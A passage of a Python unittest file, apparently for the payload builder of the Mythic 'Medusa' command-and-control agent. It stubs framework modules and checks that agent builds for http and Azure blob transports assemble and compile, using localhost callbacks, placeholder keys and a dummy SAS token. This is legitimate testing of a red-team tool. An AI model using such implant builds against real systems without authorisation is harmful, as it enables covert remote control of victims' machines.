in range(1, len(parts), 2):\n        sections[parts[i].strip()] = parts[i + 1].strip(\"\\n\")\n    return sections\n\n\ndef function_names_from_code(code: str):\n    return re.findall(r\"^\\s*def\\s+([A-Za-z_]\\w*)\\s*\\(\", code, flags=re.MULTILINE)\n\n\ndef config_keys_from_code(code: str):\n    return re.findall(r'\"([A-Za-z0-9_]+)\"\\s*:', code)\n\n\ndef install_fake_mythic_modules():\n    if \"mythic_container\" in sys.modules:\n        return\n\n    mythic_container = types.ModuleType(\"mythic_container\")\n    payload_builder = types.ModuleType(\"mythic_container.PayloadBuilder\")\n    command_base = types.ModuleType(\"mythic_container.MythicCommandBase\")\n    rpc_module = types.ModuleType(\"mythic_container.MythicRPC\")\n\n    class BuildStatus:\n        Success = \"success\"\n        Error = \"error\"\n\n    class BuildResponse:\n        def __init__(self, status=None):\n            self.status = status\n            self.build_stderr = \"\"\n            self.build_message = \"\"\n            self.payload = b\"\"\n\n        def set_status(self, status):\n            self.status = status\n\n    class BuildParameterType:\n        ChooseOne = \"ChooseOne\"\n\n    class BuildParameter:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class BuildStep:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class SupportedOS:\n        Windows = \"Windows\"\n        Linux = \"Linux\"\n        MacOS = \"MacOS\"\n\n    class PayloadType:\n        def get_parameter(self, name):\n            return self._params[name]\n\n    class MythicRPCOtherServiceRPCMessage:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    class MythicRPCPayloadUpdateBuildStepMessage:\n        def __init__(self, **kwargs):\n            self.kwargs = kwargs\n\n    payload_builder.BuildStatus = BuildStatus\n    payload_builder.BuildResponse = BuildResponse\n    payload_builder.BuildParameterType = BuildParameterType\n    payload_builder.BuildParameter = BuildParameter\n    payload_builder.BuildStep = BuildStep\n    payload_builder.PayloadType = PayloadType\n    payload_builder.SupportedOS = SupportedOS\n\n    rpc_module.MythicRPCOtherServiceRPCMessage = MythicRPCOtherServiceRPCMessage\n    rpc_module.MythicRPCPayloadUpdateBuildStepMessage = MythicRPCPayloadUpdateBuildStepMessage\n\n    sys.modules[\"mythic_container\"] = mythic_container\n    sys.modules[\"mythic_container.PayloadBuilder\"] = payload_builder\n    sys.modules[\"mythic_container.MythicCommandBase\"] = command_base\n    sys.modules[\"mythic_container.MythicRPC\"] = rpc_module\n\n\ndef load_builder_module():\n    install_fake_mythic_modules()\n    spec = importlib.util.spec_from_file_location(\"medusa_builder_for_tests\", BUILDER_PATH)\n    module = importlib.util.module_from_spec(spec)\n    spec.loader.exec_module(module)\n    return module\n\n\nclass FakeCommands:\n    def get_commands(self):\n        return [\"cwd\", \"sleep\"]\n\n\nclass FakeC2:\n    def __init__(self, name, params):\n        self._name = name\n        self._params = params\n\n    def get_c2profile(self):\n        return {\"name\": self._name}\n\n    def get_parameters_dict(self):\n        return self._params\n\n\ndef base_c2_params():\n    return {\n        \"callback_host\": \"http://127.0.0.1\",\n        \"callback_port\": \"80\",\n        \"post_uri\": \"/api/v1.4/agent_message\",\n        \"get_uri\": \"/api/v1.4/agent_message\",\n        \"query_path_name\": \"q\",\n        \"proxy_host\": \"\",\n        \"proxy_user\": \"\",\n        \"proxy_pass\": \"\",\n        \"proxy_port\": \"\",\n        \"headers\": \"{}\",\n        \"killdate\": \"2099-01-01\",\n        \"callback_interval\": \"10\",\n        \"callback_jitter\": \"5\",\n        \"AESPSK\": {\n            \"value\": \"aes256_hmac\",\n            \"enc_key\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\n            \"dec_key\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\",\n        },\n        \"encrypted_exchange_check\": \"true\",\n    }\n\n\nasync def fake_update_build_step(_msg):\n    return None\n\n\nasync def fake_other_service_rpc(_msg):\n    return types.SimpleNamespace(\n        Success=True,\n        Error=\"\",\n        Result={\n            \"blob_endpoint\": \"https://example.blob.core.windows.net\",\n            \"container_name\": \"medusa\",\n            \"sas_token\": \"sp=racwdl&sv=2025-07-05&sr=c&sig=abc\",\n        },\n    )\n\n\nclass TestPayloadBuildMatrix(unittest.TestCase):\n    def test_profiles_auto_discovered(self):\n        self.assertTrue(PROFILES, \"No transport profiles were discovered from transport_*.py2/.py3 templates\")\n\n    def _selected_values(self, env_name, allowed):\n        selected = os.getenv(env_name, \"\").strip()\n        if not selected:\n            return allowed\n        self.assertIn(selected, allowed, msg=f\"Invalid {env_name}: {selected}\")\n        return (selected,)\n\n    def _build_payload(self, profile_name, python_version, use_non_default_crypto):\n        module = load_builder_module()\n        module.SendMythicRPCPayloadUpdatebuildStep = fake_update_build_step\n        module.SendMythicRPCOtherServiceRPC = fake_other_service_rpc\n\n        medusa = module.Medusa()\n        medusa.uuid = \"11111111-1111-1111-1111-111111111111\"\n        medusa.commands = FakeCommands()\n        medusa.agent_code_path = AGENT_CODE_PATH\n        medusa._params = {\n            \"python_version\": python_version,\n            \"use_non_default_cryptography_lib\": use_non_default_crypto,\n            \"obfuscate_script\": \"No\",\n            \"output\": \"py\",\n            \"https_check\": \"Yes\",\n        }\n        medusa.c2info = [FakeC2(profile_name, base_c2_params())]\n\n        return asyncio.run(medusa.build())\n\n    def _crypto_template_text(self, py_version, crypto_impl):\n        suffix = python_version_suffix(py_version)\n        crypto_file = \"crypto_lib\" if crypto_impl == \"cryptography_lib\" else \"manual_crypto\"\n        return (BASE_AGENT_PATH / f\"{crypto_file}.{suffix}\").read_text().strip()\n\n    def _transport_sections(self, py_version, profile):\n        suffix = python_version_suffix(py_version)\n        transport_code = (BASE_AGENT_PATH / f\"transport_{profile}.{suffix}\").read_text()\n        return parse_transport_sections(transport_code)\n\n    def test_dynamic_build_matrix(self):\n        profiles = self._selected_values(\"TEST_PROFILE\", PROFILES)\n        py_versions = self._selected_values(\"TEST_PYTHON_VERSION\", PY_VERSIONS)\n        crypto_impls = self._selected_values(\"TEST_CRYPTO_IMPL\", tuple(CRYPTO_IMPLEMENTATIONS.keys()))\n\n        for profile in profiles:\n            for py_version in py_versions:\n                for crypto_impl in crypto_impls:\n                    with self.subTest(profile=profile, py_version=py_version, crypto_impl=crypto_impl):\n                        resp = self._build_payload(profile, py_version, CRYPTO_IMPLEMENTATIONS[crypto_impl])\n                        self.assertEqual(resp.status, \"success\", msg=resp.build_stderr)\n                        self.assertTrue(resp.payload)\n                        source = resp.payload.decode()\n\n                        self.assertNotIn(\"TRANSPORT_IMPORTS\", source)\n                        self.assertNotIn(\"TRANSPORT_CLASS_FIELDS\", source)\n                        self.assertNotIn(\"TRANSPORT_FUNCTIONS\", source)\n                        self.assertNotIn(\"TRANSPORT_CONFIG\", source)\n                        self.assertNotIn(\"### IMPORTS ###\", source)\n                        self.assertNotIn(\"### FUNCTIONS ###\", source)\n\n                        transport_sections = self._transport_sections(py_version, profile)\n                        for func_name in function_names_from_code(transport_sections[\"FUNCTIONS\"]):\n                            self.assertIn(f\"def {func_name}\", source)\n\n                        for config_key in config_keys_from_code(transport_sections[\"CONFIG\"]):\n                            self.assertIn(f'\"{config_key}\"', source)\n\n                        params = base_c2_params()\n                        if profile == \"http\":\n                            self.assertIn(f'\"Server\": \"{params[\"callback_host\"]}\"', source)\n                        if profile == \"azure_blob\":\n                            expected_result = asyncio.run(fake_other_service_rpc(None)).Result\n                            self.assertIn(f'blob_endpoint = \"{expected_result[\"blob_endpoint\"]}\"', source)\n                            self.assertIn(f'container_name = \"{expected_result[\"container_name\"]}\"', source)\n\n                        crypto_template = self._crypto_template_text(py_version, crypto_impl)\n                        self.assertIn(crypto_template, source)\n\n                        if py_version == \"Python 3.8\":\n                            compile(source, f\"generated_{profile}_py3.py\", \"exec\")\n\n    def test_python3_payload_pycompile(self):\n        selected_py = os.getenv(\"TEST_PYTHON_VERSION\", \"\").strip()\n        if selected_py and selected_py != \"Python 3.8\":\n            self.skipTest(\"py_compile validation is only applicable to Python 3.8 payload output\")\n\n        py3 = shutil.which(\"python3\")\n        self.assertIsNotNone(py3)\n\n        profiles = self._selected_values(\"TEST_PROFILE\", PROFILES)\n        crypto_impls = self._selected_values(\"TEST_CRYPTO_IMPL\", tuple(CRYPTO_IMPLEMENTATIONS.keys()))\n\n        for profile in profiles:\n            for crypto_impl in crypto_impls:\n                with self.subTest(profile=profile, crypto_impl=crypto_impl):\n                    resp = self._build_payload(profile, \"Python 3.8\", CRYPTO_IMPLEMENTATIONS[crypto_impl])\n                    self.assertEqual(resp.status, \"success\", msg=resp.build_stderr)\n                    source = resp.payload.decode()\n                    with tempfile.NamedTemporaryFile(\"w\", suffix=\".py\", delete=False) as f:\n                        f.write(source)\n                        tmp_path = f.name\n                    try:\n                        py_compile.compile(tmp_path, doraise=True)\n                    except py_compile.PyCompileError as e:\n                        self.fail(str(e))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n"
  }
]